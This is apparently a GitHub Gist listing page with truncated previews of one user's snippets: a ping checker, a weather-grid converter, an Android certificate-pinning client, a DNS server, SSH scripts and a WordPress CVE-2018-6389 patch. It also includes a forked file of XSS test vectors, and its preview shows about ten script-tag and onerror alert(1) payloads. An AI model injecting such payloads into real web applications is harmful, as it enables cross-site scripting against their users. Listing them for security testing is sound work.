Skip to content

Instantly share code, notes, and snippets.

@bongbongco
bongbongco / PingChecker.py
Created Mar 29, 2019
파이썬을 활용한 다량 호스트 ICMP 확인 스크립트(대상목록: target.txt, 결과목록: result.txt)
View PingChecker.py
# works under Linux, Mac OS, Windows
import subprocess, platform
from time import sleep
def ping(host):
"""
Returns True if host responds to a ping request
"""
View 기상청 격자 <-> 위경도 변환
// 소스출처 : http://www.kma.go.kr/weather/forecast/digital_forecast.jsp 내부에 있음
// 기상청에서 이걸 왜 공식적으로 공개하지 않을까?
//
// (사용 예)
// var rs = dfs_xy_conv("toLL","60","127");
// console.log(rs.lat, rs.lng);
//
<script language="javascript">
//<!--
View URLbase64ToUnit8Array.js
var BASE64_MARKER = ';base64,';
const convertDataURIToBinary = dataURI => {
var base64Index = dataURI.indexOf(BASE64_MARKER) + BASE64_MARKER.length;
var base64 = dataURI.substring(base64Index);
var raw = window.atob(base64);
var rawLength = raw.length;
var array = new Uint8Array(new ArrayBuffer(rawLength));
for(i = 0; i < rawLength; i++) {
array[i] = raw.charCodeAt(i);
@bongbongco
bongbongco / VerifiedHttpClient.java
Created Jun 28, 2018 — forked from mrworf/VerifiedHttpClient.java
Android HttpClient with cert pinning
View VerifiedHttpClient.java
/**
* Copyright 2016 Henric Andersson
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
View logstash-syslog.conf
input {
tcp {
port => 5000
type => syslog
}
udp {
port => 5000
type => syslog
}
}
View Simple DNS server (UDP and TCP) in Python using dnslib.py
# coding=utf-8
"""
LICENSE http://www.apache.org/licenses/LICENSE-2.0
"""
import datetime
import sys
import time
import threading
import traceback
import SocketServer
@bongbongco
bongbongco / CVE-2018-6389.sh
Created Feb 12, 2018
patch for DoS vulenrability (CVE-2018-6389)
View CVE-2018-6389.sh
if [[ -f wp-login.php && -f wp-admin/load-scripts.php && -f wp-admin/includes/noop.php ]]
then
sed -i "1 s/^.*$/<?php\ndefine('CONCATENATE_SCRIPTS', false);/" wp-login.php
sed -i -e "s/^require( ABSPATH . WPINC . '\/script-loader.php' );$/require( ABSPATH . 'wp-admin\/admin.php' );/g" wp-admin/load-scripts.php
sed -i -e "s/^require( ABSPATH . WPINC . '\/script-loader.php' );$/require( ABSPATH . 'wp-admin\/admin.php' );/g" wp-admin/load-styles.php
echo """<?php
/**
* Noop functions for load-scripts.php and load-styles.php.
*
* @package WordPress
@bongbongco
bongbongco / 666_lines_of_XSS_vectors.html
Created Nov 28, 2017 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
View 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
View multiprocess_paramiko.py
import multiprocessing
import paramiko
def f(*args):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('localhost', username='rpodolyaka')
View multiprocess_ssh.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ssh
from multiprocessing import Pool
import getpass
hostnames = [HOST1, HOST2]
user = USERNAME
pw = getpass.getpass("Enter ssh password:")